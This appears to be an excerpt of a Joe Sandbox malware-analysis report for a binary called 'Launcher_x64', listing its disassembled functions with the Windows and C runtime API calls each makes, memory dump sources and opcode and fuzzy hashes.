                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 66001078-0
                                                                                                                                                                                                                                                                                        • Opcode ID: be4f5f76c6600673f5e90b10474af0180d5d624034890ce13cdf471623fb29e8
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fe007ec2ae3b29919d6f1aa116782c170f3e5f779d7c66d72c429cc5533a3a9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be4f5f76c6600673f5e90b10474af0180d5d624034890ce13cdf471623fb29e8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18412935500B06EBCB20DF65F488AEAB7F5FB85310B544A1AD446D7658DB38E9C1CB70
                                                                                                                                                                                                                                                                                        Function 00D12956 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D1295D
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D12968
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D129D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D12877
                                                                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00D12983
                                                                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 00D12999
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f14c2ab57d90c711de591b0ea83c426453b99cf7d8420bd6d91a8f1613fa77ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 76a489a8c026fec7fe1efccbbe83307c7f3a98cb3c21ae488df55c89ac1a9501
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f14c2ab57d90c711de591b0ea83c426453b99cf7d8420bd6d91a8f1613fa77ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83017C79A40214AFCB06AF20E8429BD7B62FF85350B194008E81197391DF35AE92CFB5
                                                                                                                                                                                                                                                                                        Function 00D2DD31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094), ref: 00D2DD3E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094,00000000,?,00D22E6C), ref: 00D2DD48
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D2DD70
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                        • Opcode ID: 44e5ac9e205425dcefed4b7b1ea7d3c8b159f58776e3b261bc9e4b5d3173b01e
                                                                                                                                                                                                                                                                                        • Instruction ID: cf411c10601e986497639e82e497d116099122be281abcf075aec81f74ba3b21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44e5ac9e205425dcefed4b7b1ea7d3c8b159f58776e3b261bc9e4b5d3173b01e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE04F702C4B05BBEB202B61FC0AB693B57AF20B45F184470F90CE81E1E762A825DD74
                                                                                                                                                                                                                                                                                        Function 00D2B0D7 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D2B13A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D2B38C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D2B3D2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D2B475
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c8200099cb4d16fa262b94707e7af5a60e1da973d7b80af90394719c6045eb7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2ED18DB5D00258DFCB05CFA8E8909ADBBB5FF59318F18412AE456EB352D770A942CF60
                                                                                                                                                                                                                                                                                        Function 00D2254D Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction ID: e5e3a1b0967f8f95088b792858323ecb41f83be010375803340e090a0ee549c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251F572504222BFDB248F14F841BBA73A5FF64719F184529F851872A1DB31ED94DBB0
                                                                                                                                                                                                                                                                                        Function 00D28F03 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D28F67
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28F6E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D28FA8
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28FAF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction ID: 84c9c3a8e16057573887fa0971a1fe60e7f2e816bb19d5465881b647f67841cf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19210431205325BFDB10EF61F98086BB7AAFF243687048518F82987290DF30ED40ABB0
                                                                                                                                                                                                                                                                                        Function 00D197A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction ID: 6a55163133050529413693b7ee9cf764962d4ccec5a9553350c2c02c323ae4f9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A216F71204205BF9B10AF65A8B1DEAB7A9FF45364B144528F85697251EF30EC90CBB0
                                                                                                                                                                                                                                                                                        Function 00D2A2F9 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00D2A301
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A339
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A359
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1dd1c951b3a2958643cff9fc107e81a264b36cad5565f05e624e0224d3e66eb1
                                                                                                                                                                                                                                                                                        • Instruction ID: bd63b618c3b535bb1dcd6fd3c5957e130e0d34b04d949a7a2a4ce0f4e8052a90
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dd1c951b3a2958643cff9fc107e81a264b36cad5565f05e624e0224d3e66eb1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A11A1B19053367FA71277F97C89C6F7A9CEF643AC3140124F401D1100FA28DE118576
                                                                                                                                                                                                                                                                                        Function 00D14399 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D143A0
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D143AA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
                                                                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 00D143E4
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D1441B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3ffe4eb0d84028237219adc892bac6fc0f81955bf8b3268a41265473ac276aac
                                                                                                                                                                                                                                                                                        • Instruction ID: f945cd6f37ff4495ce8465d36ee8b8d5cefd69e773a097a0933bc13a6d962948
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ffe4eb0d84028237219adc892bac6fc0f81955bf8b3268a41265473ac276aac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6801A179900219ABCB05EB64F805BED7B61EF84724F244508F410A73D1CF709E80CBB0
                                                                                                                                                                                                                                                                                        Function 00D321E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000), ref: 00D321F7
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?,?,00D2AE0F,?), ref: 00D32203
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32254: CloseHandle.KERNEL32(FFFFFFFE,00D32213,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?), ref: 00D32264
                                                                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 00D32213
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D321D1,00D316BC,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32248
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32228
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f9f13d976561d17bf7d42ba22ad2bf1ad6dc44512de61e26377f7d0e21219566
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b6a2db611e65d82526a96c6f3fd5f12d89defa53f90b0387e07c3a5a4a79228
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f13d976561d17bf7d42ba22ad2bf1ad6dc44512de61e26377f7d0e21219566
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4F01C3A400215BBCF222F91EC09AAA7F26FB093A1F054110FA18C5220C7728920EFB8
                                                                                                                                                                                                                                                                                        Function 00D17110 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D17122
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D17131
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00D1713A
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00D17147
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c949e7e007648ac5ef534950dae326d8d32433d89021921dba2622549929ba6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF05F74D1120DEBCB00DBB4DA8999EBBF5EF1C200B914996A412E7210E630AB44DF61
                                                                                                                                                                                                                                                                                        Function 00D08730 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
